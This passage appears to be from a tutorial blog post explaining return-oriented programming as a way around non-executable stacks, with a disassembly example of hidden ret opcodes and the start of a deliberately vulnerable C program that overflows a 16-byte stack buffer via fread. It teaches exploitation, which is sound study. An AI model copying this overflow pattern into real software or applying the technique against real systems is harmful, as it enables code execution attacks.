    BigDecimal taxRate = this.taxRateManager.getTaxRateForCustomer(customer);
    BigDecimal multiplier = taxRate.divide(new BigDecimal(100));
    return total.multiply(multiplier.add(new BigDecimal(1)));
}
AssistedInject
Mixing the factory pattern with your dependency injection has solved the style issues you introduced in the first article by using Guice, so you might be asking yourself why Guice doesn't offer something to do this for us because this would seem to be a fairly common situation.
Well, Guice actually might offer it soon. Jesse Wilson and Jerome Mourits, a pair of engineers at Google, have created a Guice add-on called AssistedInject which formalizes the use of the factory pattern described above and makes it more Guicy as well. You can download and use the extension now, and a description of it is available on the Guice Google group. It is also going to be submitted to the core Guice project for future inclusion.
Recap
So, that's pretty much it. You can download the source code in the form of a NetBeans project that has been adapted to use both Guice and the factory pattern. You have corrected many of the style issues introduced in the first article when you added Guice to the application. What you should take away from this is that Dependency Injection, although very useful, is only one tool in the toolbox. It can be mixed with other software development practices and design patterns where appropriate, and where it makes sense. Used correctly, it can make your implementation and architecture more beautiful. If that is not the case, you are probably mis-using Guice and you should look for another, cleaner way of achieving the same thing (like in this case—using Guice to inject into a factory class instead, and then using the factory to create instances with immutable properties).
Testing Both Sides of Your Class
Looking at what you have so far, are you doing a good job of testing your Invoice class? Probably not; one test under ideal conditions is not very exhaustive. You get some points for adding a couple of different items to the Invoice and then asking for the total with tax—forcing it to sum up the cost of the items and apply the tax to that sum, but you are only testing one possible customer so you should probably make another call with a different customer and resulting tax rate, and ensure that the total is correct for that as well.
What about customers that don't exist? Your implementation of the FakeTaxRateManager returns a 0 for the tax rate in this case—in other words, it fails silently. In a production system, this is probably not what you want; throwing an exception is probably a better idea.
Okay, say you add a test for another customer that exists with a different tax rate, and check the total for that is different from the first customer. Then, you add another test for a non-existent customer and expect an exception to be thrown. Are you well covered then?
I would like to also make sure that these Invoice instances don't interfere with each other, so a test to add items to different Invoices with different Customers to make sure there is no effect from adding items in one invoice to the total in the other seems like a good idea too.
All of this sounds very exhaustive—surely you have tested your little class well if we do all of this? At least, that is what you would think if you were only used to looking at the one side of your class, the API calls (or if you like, the input to your class). There is another side though, what this class calls—in particular, the calls it makes to the TaxRateManager.
You can tell that the calls are probably pretty near correct because you are getting back the amounts you are expecting, but suppose Invoice is very inefficient and calls the TaxRateManager ten times instead of one to try and get the answer? In a system that needs to be highly performant, that is unacceptable overhead. You want to make sure that, for a given call to getTotalWithTax, only one lookup call is made, for the correct customer, to the TaxRateManager.
| http://www.developer.com/design/article.php/10925_3688436_2/Squeezing-More-Guice-from-Your-Tests-with-EasyMock.htm | CC-MAIN-2015-18 | refinedweb | 908 | 50.57 |
I can't understand the end of this code (array = 0;)
#include <iostream>
int main()
{
std::cout << "Enter a positive integer: ";
int length;
std::cin >> length;
int *array = new int[length];
std::cout << "I just allocated an array of integers of length " << length << '\n';
array[0] = 5; // set element 0 to value 5
delete[] array; // use array delete to deallocate array
array = 0; // use nullptr instead of 0 in C++11
return 0;
}
After array has been returned to the OS, there is no need to assign it a value of 0, right?
You're right, it is not needed because the memory is freed. But think of a case where you may use the pointer in another place in your code (functions, loops, etc.) after you use
delete on it.
The
array variable still holds the address of the old allocation after the
delete statement was called (a dangling pointer). If you access that address you get undefined behaviour (UB) because the memory is no longer yours; in most cases your program would crash.
To avoid that you do checks like:
if (array != nullptr) { /* access array */ ... }
To make that check possible you set the pointer to
nullptr or
NULL if C++11 is not available. The
nullptr keyword introduces type safety because it acts like a pointer type and should be preferred over
NULL. To define your own
nullptr for use with a pre-C++11 compiler, look here: How to define our own nullptr in c++98?
W3C is pleased to receive the Data Extraction Language submission specification from Republica Corp.
The Data Extraction Language is an XML vocabulary for describing a set of rules to transform structured text data to XML. DEL defines markup to extract relevant information from a text file and to construct an XML file.
There are many languages and systems designed to assist in extracting information from text, including Perl (the "e" in the original acronym stood for "extraction") and the wide field of lexical scanners and parser generators (such as lex and yacc). Also related is XSLT, an XML transformation language which can, to a certain extent, parse text files to generate XML output. Although XSLT 1.0 does not define functions to parse text using regular expressions, it allows the definition of extensions to do so. A few implementations make this mechanism available, making XSLT an appropriate standard to compare DEL to. XSLT 2.0 is expected to support regular expressions through XPath 2.0 (see item 3 in the XPath 2.0 requirements).
Not all of DEL's features are covered by XSLT, for example, the possibility of generating CDATA sections, or to control the way the result XML file is output with the "Document Ready" function. On the other hand XSLT provides many useful functions, such as sorting and numbering, that DEL lacks. One particular feature that DEL could have borrowed from XSLT which would have made the language simpler is the way the result tree is built. While XSLT uses namespaces to allow instantiating the result tree directly, DEL went for the more complicated solution of using constructor elements (<map>) as well as a 'cursor' to navigate through the output tree and add new XML constructs.
It is unfortunate that the text of the submission leaves many questions unanswered. Examples are:
Below I will try to provide brief answers to the questions posed in the W3C Team comment.
* Where exactly do 'over' and 'upto' start or end in the input stream? Both 'over' and 'upto' start at the current ('cursor' or 'offset') position in the input stream. 'over' causes the DEL processor to advance in the input stream until a pattern/regexp is fully matched i.e. input stream cursor/offset is set immediately after the last character matched by the pattern/regexp. 'upto' tells the DEL processor to advance the input stream cursor/offset and stop at the first character of the pattern/regexp match. This first character of the match will be included in the search range of next <extract> command(s).
* What is a dataStreamError? dataStreamError marks a status of the DEL processor set (only) by the <extract> command. dataStreamError -status causes the DEL processor to break out (=continue with the next command on the same nesting level) of nearest parent <repeat> loop. If there is no <repeat> command among the parent elements, the entire DEL script will fail with dataStreamError (which means the DEL processor could not find a match for a pattern/regexp given in a <extract> command and thus is unable to continue with the DEL execution). In case the <extract> command that set the dataStreamError status is not directly a child element of <repeat> command, the DEL processor will step through parent elements until it encounters a <repeat> element (to break out of).
* What does the 'text' function compare exactly? In the absence of a data model, one would imagine that it is string values. But having all examples use numbers can be misleading, it could be assumed that "1.0" and "1" compare as equal. Moreover, the content of "value" attributes is not defined. Only the examples show that it can either be a number or a variable name, but that is not written explicitly. We assume the 'text' function refers to the <test> command. The content of Value1 and Value2 attributes depends on the TestType attribute:
In all cases listed above, the Value1 and Value2 attributes can contain a reference to register, in which case the register name gets replaced with the current content of the register.
* What exactly does "re_equal" test? "re_equal" tests if a string (a literal or a register content) completely matches a regexp. It is similar to the <extract> function's exptype "content" in a sense it requires the regexp match to occur immediately at the beginning of the string.
This submission will be referred to the attention of the XSL Working Group, as the use cases and parsing mechanism could serve as a starting point for the definition of regular expression matching in XPath 2.0.
Disclaimer: Placing a Submission on a Working Group agenda does not imply endorsement by either the W3C Team or the participants of the Working Group, nor does it guarantee that the Working Group will agree to take any specific action on a Submission. | http://www.w3.org/Submission/2001/10/Comment | CC-MAIN-2016-44 | refinedweb | 807 | 51.38 |
Expector
This package provides a way to write tests more easily in a fluent manner (with content assists).
Instead of writing expect(value, matcher) and providing a matcher to check the value, just type expectThat(value). and let the content assist do its job!
Usage
A simple usage example:
import 'package:expector/expector.dart';
import 'package:test/test.dart';

String? f() => 'hello';

void main() {
  test('f() returns a 5-length string', () {
    expectThat(f()).isNotNull
      ..isNotEmpty
      ..hasLength(5);
  });
}
What's the problem with test package ?
The test package allows users to describe
expectations with matchers:
expect(value, matcher). Unfortunately there are
a lot of matchers and it's easy to use a matcher that has no meaning regarding
the value tested. In this case, there will be no error at compile time but there
will be a runtime error. For instance:
import 'package:test/test.dart';

String? f() => 'hello';

void main() {
  test('f() returns a 5-length string', () {
    expect(f(), isNotNull);
    expect(f(), isNotEmpty);
    expect(f(), hasLength(5));
    expect(f(), isNaN); // no compile-time error, fails only at runtime
  });
}
Another issue is that there is no content assist to help user. Everything is suitable as matcher and it could be hard to find the good one.
License
Apache 2.0 | https://pub.dev/documentation/expector/latest/ | CC-MAIN-2021-25 | refinedweb | 203 | 58.69 |
Here's some code I'm reading from a tutorial, and I'm trying to make my own program while learning from it. I try to compile this, and I get errors:
#include <stdio.h>
#include <stdlib.h>
struct person {
char name [20];
struct person *next;
};
struct person *new;
struct person *head;
head = NULL;
main()
{
new = (person*)malloc (sizeof(struct person));
new->next = head;
head = new;
}
The errors are:
Error c:\tc\test.c 10: Declaration needs type or storage class
Error c:\tc\test.c 10: Type mismatch in redeclaration of 'head'
Error c:\tc\test.c 13: Undefined symbol 'person' in function main
Error c:\tc\test.c 13: Expression syntax in function main
*** 4 errors in Compile ***
Any advice? This code is exactly as written in the book I'm reading.
When declred in a program they are usually at the top, before any functions are used, depending on your programing practices, and will look like this
#include < stdio.h >
When declred in a program they are usually at the top, before any functions are used, depending on your programing practices, and will look like this
#include < stdio:
114,517+ people in England,
24,577+ people in Germany,
25 people in the United States of America,
That's a total of 173408+ people killed for being a witch (according to the Catholic Church). That's one person a day for 475 years!… | http://everything2.com/node/ticker/New+Writeups+Atom+Feed?foruser=genus_001 | CC-MAIN-2015-48 | refinedweb | 101 | 55.92 |
8.3. Learning to recognize handwritten digits with a K-nearest neighbors classifier

In this recipe, we will see how to recognize handwritten digits with a K-nearest neighbors (K-NN) classifier. This classifier is a simple but powerful model, well-adapted to complex, highly nonlinear datasets such as images. We will explain how it works later in this recipe.
How to do it...
1. We import the modules:
import numpy as np
import sklearn
import sklearn.datasets as ds
import sklearn.model_selection as ms
import sklearn.neighbors as nb
import matplotlib.pyplot as plt
%matplotlib inline
2. Let's load the digits dataset, part of the
datasets module of scikit-learn. This dataset contains handwritten digits that have been manually labeled:
digits = ds.load_digits()
X = digits.data
y = digits.target
print((X.min(), X.max()))
print(X.shape)
(0.0, 16.0) (1797, 64)
In the matrix
X, each row contains
8*8=64 pixels (in grayscale, values between 0 and 16). The row-major ordering is used.
3. Let's display some of the images along with their labels:
nrows, ncols = 2, 5
fig, axes = plt.subplots(nrows, ncols, figsize=(6, 3))
for i in range(nrows):
    for j in range(ncols):
        # Image index
        k = j + i * ncols
        ax = axes[i, j]
        ax.matshow(digits.images[k, ...], cmap=plt.cm.gray)
        ax.set_axis_off()
        ax.set_title(digits.target[k])
4. Now, let's fit a K-nearest neighbors classifier on the data:
(X_train, X_test, y_train, y_test) = \ ms.train_test_split(X, y, test_size=.25)
knc = nb.KNeighborsClassifier()
knc.fit(X_train, y_train)
5. Let's evaluate the score of the trained classifier on the test dataset:
knc.score(X_test, y_test)
0.987
6. Now, let's see if our classifier can recognize a handwritten digit:
# Let's draw a 1.
one = np.zeros((8, 8))
one[1:-1, 4] = 16  # The image values are in [0, 16].
one[2, 3] = 16
fig, ax = plt.subplots(1, 1, figsize=(2, 2))
ax.imshow(one, interpolation='none', cmap=plt.cm.gray)
ax.grid(False)
ax.set_axis_off()
ax.set_title("One")
# We need to pass a (1, D) array. knc.predict(one.reshape((1, -1)))
array([1])
Good job!
How it works...
This example illustrates how to deal with images in scikit-learn. An image is a 2D \((N, M)\) matrix, which has \(NM\) features. This matrix needs to be flattened when composing the data matrix; each row is a full image.
The idea of K-nearest neighbors is as follows: given a new point in the feature space, find the K closest points from the training set and assign the label of the majority of those points.
The distance is generally the Euclidean distance, but other distances can be used too.
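As a plain-Python sketch of that procedure (for clarity only — this is not how scikit-learn implements it), prediction is just "sort by distance, keep k, majority vote":

```python
import math
from collections import Counter

def knn_predict(X_train, y_train, x, k=3):
    """Label x by majority vote among its k nearest training points
    (Euclidean distance)."""
    # Sort training points by distance to x and keep the k closest.
    neighbors = sorted(zip(X_train, y_train),
                       key=lambda pl: math.dist(pl[0], x))[:k]
    # Majority vote over the neighbors' labels.
    votes = Counter(label for _, label in neighbors)
    return votes.most_common(1)[0][0]

X_train = [(0, 0), (0, 1), (1, 0), (5, 5), (5, 6), (6, 5)]
y_train = ['a', 'a', 'a', 'b', 'b', 'b']
print(knn_predict(X_train, y_train, (0.5, 0.5)))  # a
print(knn_predict(X_train, y_train, (5.5, 5.5)))  # b
```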
The following image, obtained from the scikit-learn documentation at, shows the space partition obtained with a 15-nearest-neighbors classifier on a toy dataset (with three labels):
The number \(K\) is a hyperparameter of the model. If it is too small, the model will not generalize well (high variance). In particular, it will be highly sensitive to outliers. By contrast, the precision of the model will worsen if \(K\) is too large. At the extreme, if \(K\) is equal to the total number of points, the model will always predict the exact same value disregarding the input (high bias). There are heuristics to choose this hyperparameter.
It should be noted that no model is learned by a K-nearest neighbor algorithm; the classifier just stores all data points and compares any new target points with them. This is an example of instance-based learning. It is in contrast to other classifiers such as the logistic regression model, which explicitly learns a simple mathematical model on the training data.
The K-nearest neighbors method works well on complex classification problems that have irregular decision boundaries. However, it might be computationally intensive with large training datasets because a large number of distances have to be computed for testing. Dedicated tree-based data structures such as K-D trees or ball trees can be used to accelerate the search of nearest neighbors.
The K-nearest neighbors method can be used for classification, like here, and also for regression problems. The model assigns the average of the target value of the nearest neighbors. In both cases, different weighting strategies can be used.
There's more...
Here are a few references:
- The K-NN algorithm in scikit-learn's documentation, available at
- The K-NN algorithm on Wikipedia, available at
- Blog post about how to choose the K hyperparameter, available at
- Instance-based learning on Wikipedia, available at
See also
- Predicting who will survive on the Titanic with logistic regression
- Using support vector machines for classification tasks | https://ipython-books.github.io/83-learning-to-recognize-handwritten-digits-with-a-k-nearest-neighbors-classifier/ | CC-MAIN-2019-09 | refinedweb | 785 | 58.08 |
Writing tests¶
Tests in MicroPython are located at the path
tests/. The following is a listing of
key directories and the run-tests.py runner script:
.
├── basics
├── extmod
├── float
├── micropython
├── run-tests.py
...
There are subfolders maintained to categorize the tests. Add a test by creating a new file in one of the existing folders or in a new folder. It’s also possible to make custom tests outside this tests folder, which would be recommended for a custom port.
For example, add the following code in a file
print.py in the
tests/unix/ subdirectory:
def print_one():
    print(1)

print_one()
If you run your tests, this test should appear in the test output:
$ cd ports/unix
$ make tests
skip  unix/extra_coverage.py
pass  unix/ffi_callback.py
pass  unix/ffi_float.py
pass  unix/ffi_float2.py
pass  unix/print.py
pass  unix/time.py
pass  unix/time2.py
Tests are run by comparing the output from the test target against the output from CPython. So any test should use print statements to indicate test results.
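For instance, a hypothetical test file (the name and contents below are illustrative, not an actual test from the suite) just prints values and lets the runner diff them against CPython's output:

```python
# tests/basics/int_ops.py (hypothetical): print results only --
# run-tests.py compares this output against CPython's output
# for the same script.
for x in (0, 1, -7, 2**30):
    print(x, x + 1, x * x, x // 3)
```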
For tests that can’t be compared to CPython (i.e. micropython-specific functionality),
you can provide a
.py.exp file which will be used as the truth for comparison.
The other way to run tests, which is useful when running on targets other than the Unix port, is:
$ cd tests
$ ./run-tests.py
Then to run on a board:
$ ./run-tests.py --target minimal --device /dev/ttyACM0
And to run only a certain set of tests (eg a directory):
$ ./run-tests.py -d basics
$ ./run-tests.py float/builtin*.py
Having spent a decent amount of time watching both the r and pandas tags on SO, the impression that I get is that pandas questions are less likely to include reproducible examples.
import pandas as pd
df = pd.DataFrame({'user': ['Bob', 'Jane', 'Alice'],
'income': [40000, 50000, 42000]})
Note: The ideas here are pretty generic for StackOverflow, indeed questions.
do include small* example DataFrame, either as runnable code:
In [1]: df = pd.DataFrame([[1, 2], [1, 3], [4, 6]], columns=['A', 'B'])
or make it "copy and pasteable" using
pd.read_clipboard(sep='\s\s+'), you can format the text for StackOverflow highlight and use Ctrl+K (or prepend four spaces to each line):
In [2]: df
Out[2]:
   A  B
0  1  2
1  1  3
2  4  6
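As an aside (my own addition, not from the post above): the pasted text itself can be made runnable by feeding it through io.StringIO, which keeps the question fully reproducible for people answering:

```python
import io
import pandas as pd

# The formatted block from the question, pasted verbatim:
text = """\
A  B
1  2
1  3
4  6
"""
# Read it back into a DataFrame; \s+ handles the aligned columns.
df = pd.read_csv(io.StringIO(text), sep=r"\s+")
print(df.groupby("A", as_index=False).sum())
```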
In [3]: iwantthis
Out[3]:
   A  B
0  1  5
1  4  6
Explain what the numbers come from: the 5 is sum of the B column for the rows where A is 1.
do show the code you've tried:
In [4]: df.groupby('A').sum() Out[4]: B A 1 5 4 6
But say what's incorrect: the A column is in the index rather than a column.
do show you've done some research (search the docs, search StackOverflow), give a summary:
The docstring for sum simply states "Compute sum of group values"
The groupby docs don't give any examples for this.
Aside: the answer here is to use
df.groupby('A', as_index=False).sum().
if it's relevant that you have Timestamp columns, e.g. you're resampling or something, then be explicit and apply
pd.to_datetime to them for good measure**.
df['date'] = pd.to_datetime(df['date']) # this column ought to be date..
** Sometimes this is the issue itself: they were strings.
don't include a MultiIndex, which we can't copy and paste (see above), this is kind of a grievance with pandas default display but nonetheless annoying:
In [11]: df Out[11]: C A B 1 2 3 2 6
The correct way is to include an ordinary DataFrame with a
set_index call:
In [12]: df = pd.DataFrame([[1, 2, 3], [1, 2, 6]], columns=['A', 'B', 'C']).set_index(['A', 'B']) In [13]: df Out[13]: C A B 1 2 3 2 6
do provide insight to what it is when giving the outcome you want:
B A 1 1 5).
don't link to a csv we don't has access to (ideally don't link to an external source at all...)
df = pd.read_csv('my_secret_file.csv') # ideally with lots of parsing options. | https://codedump.io/share/43VdzBc9BtM1/1/how-to-make-good-reproducible-pandas-examples | CC-MAIN-2017-39 | refinedweb | 429 | 77.47 |
select_detach()
Detach a file descriptor from a dispatch handle
Synopsis:
#include <sys/iofunc.h> #include <sys/dispatch.h> int select_detach( void *dpp, int fd );
Since:
BlackBerry 10.0.0
Arguments:
- dpp
- The dispatch handle, as returned by a successful call to dispatch_create(), that you want to detach from the file descriptor.
- fd
- The file descriptor that you want to detach.
Library:
libc
Use the -l c option to qcc to link against this library. This library is usually included automatically.
Description:
The function select_detach() detaches the file descriptor fd that was registered with dispatch dpp, using the select_attach() call.
Returns:
- 0
- Success.
- -1
- The file descriptor fd wasn't registered with the dispatch dpp.
Examples:
#include <sys/dispatch.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> int my_func( … ) { … } int main( int argc, char **argv ) { dispatch_t *dpp; int fd; select_attr_t attr; ); … if ( (select_detach( dpp, fd )) == -1 ) { fprintf( stderr, "Failed to detach \ the file descriptor.\n" ); return 1; } }
For examples using the dispatch interface, see dispatch_create(), message_attach(), resmgr_attach(), and thread_pool_create().
Classification:
Last modified: 2014-06-24
Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus | http://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/s/select_detach.html | CC-MAIN-2016-44 | refinedweb | 192 | 53.58 |
In this tutorial, we are going to learn to code the aforementioned grid in C++ To begin with, we need to import ROOT so that we can use the toolkit. We also set our Notebook to C++
from ROOTaaS.iPyROOT import ROOT ROOT.toCpp()
Welcome to ROOTaas Beta
Notebook is in Cpp mode
auto pi = TMath::Pi();
Here we are writing the code for our functions that we will call on later. The "*"s are pointers, that access a certain area of the memory (only in the first set of parentheses of each line, the others are multiplications).
The ".dcl" marks a cell as used for declaration of functions.
.dcl double single(double *x, double *par){return pow(sin(pi*par[0]*x[0])/(pi*par[0]*x[0]),2);}; double nslit0(double *x, double *par){return pow(sin(pi*par[1]*x[0])/sin(pi*x[0]),2);}; double nslit(double *x, double *par){return single(x,par) * nslit0(x,par);};
We set the number of slits to 4, and the ration of slit width to distance between slits to 2.
float r=.2,ns=2;
Here we are using the ROOT Type TF1 to write our function and we add the "*" pointer before our Fnslit object so that the information can be saved to the computer's memory. We set the options for our function with the command SetNpx. Here we use the "->" because we are setting a command to an object with a pointer.
TF1 Fnslit("Fnslit",nslit,-5.001,5.,2); Fnslit.SetNpx(500);
Here you can see that we are setting the parameters for the code, so that we can apply them as fixed variables that we state at the beginning of our code. This saves us the trouble of entering long numbers over and over again. Note that the parameter number starts at 0, not 1.
Fnslit.SetParameters(r,ns);
Now that we've got our code nicely written out, we can use the "Draw" command so that we can see the graph.
Fnslit.Draw();
Info in <TCanvas::MakeDefCanvas>: created default TCanvas with name c1 | https://nbviewer.ipython.org/urls/indico.cern.ch/event/395198/material/1/10.ipynb | CC-MAIN-2021-49 | refinedweb | 351 | 68.3 |
Generics are great but in C# they seem to be limited in what they can do - specifically you can't have an operation that depends on the type actually used. However generic delegates provide a way of implementing type dependent operations in a generic method. This article takes a look at how this works using the Array as an example.
We all know and love arrays but .NET has some data structures and facilities that are just a touch more sophisticated than the simple array. What is often not realised is that the introduction of generics has changed the way that even simple things like arrays can be used. In this article we look at the way generic alternatives to the usual array methods are used. It also provides an interesting example of non-generic v generic approaches to coding simple things.
In particular it provides an example of how we can overcome one of the big problems in using generics - type specific operations. Using generic delegates you can implement a generic algorithm that uses operations which depend on the type specified when the generic is used.
The .NET array was already a fairly sophisticated construct compared to simple languages because it treats everything as an object. This means that arrays not only store data they also can have methods that do things. In most cases however these methods are provided by the static Array object.
For example:
int[] A = new int[50];//put some data into AArray.Sort(A);
results in the array A being sorted into ascending order using a QuickSort.
Thing are a little more sophisticated than the appear because you can see the order relation used in the sort. The point is that you can have an array of strongly typed objects and in this case you need to defined what a sorted order is.
To define the order relation used in the sort you need to implement an object with an IComparer interface. This defines a Compare method that returns –1, 0, or 1 depending on the result of the compare:
private class CMyCompare : IComparer{ int IComparer.Compare(Object x, Object y) {
The problem now is that we have to do the comparison between x and y but this is difficult without knowing what types they are. Without generics this is the only way you can define the interface.
The simplest solution is to cast to the type that you know is stored in the array and then use the type’s CompareTo method:
private class CMyCompare : IComparer{ int IComparer.Compare(Object x, Object y) { return (((int)y).CompareTo((int)x)); }}
Array.Sort(A, new CMyCompare());
The wider point being made is that without using generics this is the only way the job can be done. You need an interface to define the form of the function to be used and you have to cast to actually do the work that makes use of the nature of the objects actually being passed. This clearly isn't type safe at compile time as the casts cannot be checked but it can be made type safe at runtime by adding code to make sure the objects are of a type you can work with.
This is all good but it’s pre-generics which were introduced as long ago as .NET 2.0. Arguably generics provide a better way of implementing sorting methods that work with any type. The big problem with generics is that you can't use them to do things that are type specific. That is if you have two objects that are specified as generic you can't add them together even if in they support the operation. That is you can't write something like:
T x;T y;T z;z=x+y;
because the type of T isn't specified.
This seems to reduce the usefulness of generics. But this isn't always the case because you can define operations on generics using a generic delegate i.e. a method type with a generic signature. The concrete operation is then provided by a specific instance of the delegate that has a fully defined signature that fits the generic specification.
In .NET a number of new generic sort methods were introduced. For example:
public static void Sort<T> ( T[] array, Comparison<T> comparison)
This uses the generic Comparison delegate to supply the order relation used in the sort:
public delegate int Comparison<T> (T x,T y)
To implement the same sort as we did using IComparer all we have to do is write a Comparison function - no interfaces necessary:
public int MyCompare(int x, int y){return (((int)y).CompareTo((int)x));}
Now as long as we select the generic sort i.e. Sort<T> all we have to change is - well nothing much at all:
Array.Sort(A, MyCompare);
Notice this differs slightly from the use of generics we normally encounter. The MyCompare function simply has to have the correct signature and the system uses the type information to instantiate the generic within the Sort method.
This becomes slightly clearer if you write it out fully as:
Array.Sort<int>( A,new Comparison<int>(MyCompare));
which instantiates the Sort definition to:
public static void Sort ( int [] array, Comparison< int > comparison)
To understand what a generic definition actually produces it is often helpful to actually write out the result of setting the type parameters to particular values.
In turn the definition of Comparison is:
public delegate int Comparison (int x,int y)
This is, of course, the signature of the function that we are actually passing. Notice that the shorthand way of writing the function call saves specifying the data type twice and it also automatically creates the delegate using the “method group conversion” facility.
<ASIN:0470495995>
<ASIN:1430229799>
<ASIN:0262201755>
<ASIN:0596800959> | https://i-programmer.info/programming/c/2060-generics-and-arrays.html | CC-MAIN-2021-17 | refinedweb | 973 | 51.28 |
Buttons communicate the action that will occur when the user touches them.
Material buttons trigger an ink reaction on press. They may display text, imagery, or both. Flat buttons and raised buttons are the most commonly used types.
Flat buttons are text-only buttons. They may be used in dialogs, toolbars, or inline. They do not lift, but fill with color on press.
Outlined buttons are text-only buttons with medium emphasis. They behave like flat buttons but have an outline and are typically used for actions that are important, but aren’t the primary action in an app.
Raised buttons are rectangular-shaped buttons. They may be used inline. They lift and display ink reactions on press.
A floating action button represents the primary action in an application. Shaped like a circled icon floating above the UI, it has an ink wash upon focus and lifts upon selection. When pressed, it may contain more related actions.
Only one floating action button is recommended per screen to represent the most common action.
The floating action button animates onto the screen as an expanding piece of material, by default.
A floating action button that spans multiple lateral screens (such as tabbed screens) should briefly disappear, then reappear if its action changes.
The Zoom transition can be used to achieve this. Note that since both the exiting and entering
animations are triggered at the same time, we use
enterDelay to allow the outgoing Floating Action Button's
animation to finish before the new one enters.
Icon buttons are commonly found in app bars and toolbars.
Icons are also appropriate for toggle buttons that allow a single choice to be selected or deselected, such as adding or removing a star to an item.
Sometimes you might want to have icons for certain button to enhance the UX of the application as we recognize logos more easily than plain text. For example, if you have a delete button you can label it with a dustbin icon.
If you have been reading the overrides documentation page but you are not confident jumping in, here's an example of how you can change the main color of a Button.
The Flat Buttons, Raised Buttons, Floating Action Buttons and Icon Buttons are built on top of the same component: the
ButtonBase.
You can take advantage of this lower level component to build custom interactions.
One common use case is to use the button to trigger a navigation to a new page.
The
ButtonBase component provides a property to handle this use case:
component.
Given that a lot of our interactive components rely on
ButtonBase, you should be
able to take advantage of it everywhere:
import { Link } from 'react-router-dom' import Button from '@material-ui/core/Button'; <Button component={Link} Link </Button>
or if you want to avoid properties collisions:
import { Link } from 'react-router-dom' import Button from '@material-ui/core/Button'; const MyLink = props => <Link to="/open-collective" {...props} /> <Button component={MyLink}> Link </Button>
Note: Creating
MyLink is necessary to prevent unexpected unmounting. You can read more about it here. | https://material-ui-next.com/demos/buttons/ | CC-MAIN-2019-04 | refinedweb | 515 | 55.74 |
Details
- Type: Bug
- Status: Closed
- Priority: P1: Critical
- Resolution: Done
- Affects Version/s: 5.6.2, 5.8.0, 5.9, 5.12.0 RC, 5.12.0, 5.12.1
- Fix Version/s: 5.12.2, 5.14.0 Alpha
- Component/s: Core: Animation Framework, Quick: Core Declarative QML
- Labels:
- Environment:Windows 10 1703 64 bit
MSVC2015 32 bit
MSVC2015 64 bit
- Commits:730f0df17db53b249b8680a14c40d12107c8e24e (qt/qtbase/5.12)
Description
DelayButton finishes in half delay time depending on the screen it's shown on
- Have a primary UHD-screen scaled to 200% and a secondary FullHD-screen scaled to 100%.
- Run the example "Qt Quick Extras - Gallery".
It's in Examples\Qt-5.9\quickcontrols\extras\gallery\gallery.pro
- Click on "DelayButton".
- Show the example on the primary screen.
- Click on the DelayButton and keep the mouse button pressed.
It will take 3 seconds until the DelayButton starts flashing. 3000ms is the default delay of a DelayButton.
- Click on the DelayButton.
It stops flashing.
- Move the example to the secondary screen.
- Click on the DelayButton and keep the mouse button pressed.
It will only take 1.5 seconds until the DelayButton starts flashing. If you set a higher delay, the example will still use only half the time on the secondary screen.
The DelayButton should always start flashing after the set delay, or after the default if not delay was set explicitly. By no means this duration should depend on the screen the DelayButton is shown on.
Another way to see the same effect is using the qmlpreview inside the QtDesignStudio and change the zoomfactor:
import QtQuick 2.9 Rectangle { visible: true width: 640 height: 1000 color: "blue" Rectangle { id: testRect y: 4 width: parent.width height: 10 } NumberAnimation { id: testAni target: testRect property: "height" running: true to: 1000 from: 0 loops: -1 duration: 10000 } }
Attachments
Issue Links
- is duplicated by
QTBUG-71094 animation runs faster after the qmlpreview refreshed the app
-
- Closed | https://bugreports.qt.io/browse/QTBUG-59660 | CC-MAIN-2022-21 | refinedweb | 323 | 59.5 |
Here's the assignment I was given:
The government introduces a new program of educational savings accounts. It adds a 20% bonus of whatever you contributed to the account up to a maximum of a $400 for a $2000 annual deposit. Create a program called CollegeSavings that obtains an amount deposited by the user and outputs the balance in the account including the bonus from the government.
So I set up this code
I know this is ridden with flaws but I just need to know where did I go wrong. If anyone was kind enough a revised code wouldn't hurt.I know this is ridden with flaws but I just need to know where did I go wrong. If anyone was kind enough a revised code wouldn't hurt.PHP Code:
import hsa.*;
// The "CollegeSavings" class.
public class CollegeSavings
{
public static void main (String[] args)
{double deposit, bonus, output;
Stdout.println("Please input annual deposit up to $2000 annual deposit");
deposit=Stdin.readDouble();
if (deposit>20000, bonus>400)
Stdout.println("Unacceptable entry");
else if (deposit<=2000, bonus<=400)
output=(deposit*1.20);
Stdout.println("College savings grant:" + "$" + output);}
// Place your code here
} // main method
} // CollegeSavings class | http://www.javaprogrammingforums.com/java-theory-questions/23257-what-wrong-my-code.html | CC-MAIN-2014-52 | refinedweb | 198 | 58.58 |
Applets are small applications that are accessed on an Internet Server, transported Internet, automatically installed, and run as part of a Web document.
Applet is a program written in Java and included or embedded in an HTML page. An applet is automatically loaded and executed when you open a web page that has the applet. The applet runs in a web page that is loaded in a web browser. The life cycle of an applet is implemented using methods, init(), start(), stop(), and destroy().
Once an applet arrives on the client, it has limited access to resources, so that it can produce an arbitrary multimedia user interface and run complex computations.
A sample applet:
import java.awt.*; import java.applet.*; public class SimpleApplet extends Applet { public void paint(Graphics g){ g.drawString("Hello World", 20,20); } }
Applet begins with two import statements
sincerelibran explained it very well though so there is not much left to say but I'll say it anyway.
When you run the applet code in java, it asks for a height and width then it runs your program. But after you entered the height and width, it automaticly made a HTML file where the applet was saved.
That HTML file is your applet you just executed. With this HTML, you can embed it into a web page for people to view and play online!
The applet snippet above draws "Hello World!" onto the screen at x coordinate 20 and y coordinate 20. To use the "public void paint(Graphics g)" you MUST import the java.awt.*; for the graphics to work.
Also (from past experience) the graphics class get draw right after the init class so any buttons or textfields will not be shown, but they are there. (just painted over).
Also you must import java.applet.*; to make the applet.
I hope that this answers your question.
javanoob101
well bullockc83,
I don't think there is much left to explain so mark this thread as "solved"?
Mmmmmmmm! Those do look good! :) | https://www.daniweb.com/programming/software-development/threads/342699/what-is-applet-in-java | CC-MAIN-2019-04 | refinedweb | 336 | 66.23 |
Cannot use Blynk with M5StickC +
Hello,
I'm certainly missing something super obvious here. So i need your help
I tried the sample code provided in the doc but it is not easy for me.
Also if you can point me to more tutorials on blynk feel free to do it.
Environment
- M5StickC+
- FW 1.9.8
- NCIR HAT
Issue
When using Blynk nothing happens in Run mode. M5Stick screen remains stalled, with Labels with its default value. Nothing also on the Blynk app side.
M5Stick works fine, when i remove all the blynk related stuff it works great. See other post for the code
What am I missing here?
